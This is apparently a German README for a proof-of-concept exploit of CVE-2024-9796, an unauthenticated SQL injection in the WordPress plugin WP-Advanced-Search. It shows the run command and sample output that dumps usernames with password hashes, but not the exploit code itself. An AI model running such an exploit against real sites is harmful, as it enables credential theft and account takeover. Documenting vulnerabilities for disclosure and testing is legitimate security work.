
CVE-2024-9796 WP-Advanced-Search < 3.3.9.2 - Nicht authentifizierte SQL-Injection. PoC.
Der PoC SQL-Injection wird WordPress-Benutzer und Hashes auslesen.
Dieses Skript dient nur zu Bildungszwecken.
Verwenden Sie es nicht für illegale Zwecke.
Falls Sie es dennoch tun, liegt dies in Ihrer alleinigen Verantwortung; ich hafte nicht für Missbrauch.
https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/
# Erfolgreicher Versuch
python3 poc.py -i 127.0.0.1
[!] 127.0.0.1 wurde PWNed!
admin:$P$H5blBNpO5AVI7eDJJi95E6pso16h981
user:$P$H1Sa1pcnzwWha3G9XH5rkfB6wOcE2a1
# Nicht erfolgreicher Versuch
python3 poc.py -i 127.0.0.1
[!] Sieht nicht verwundbar aus..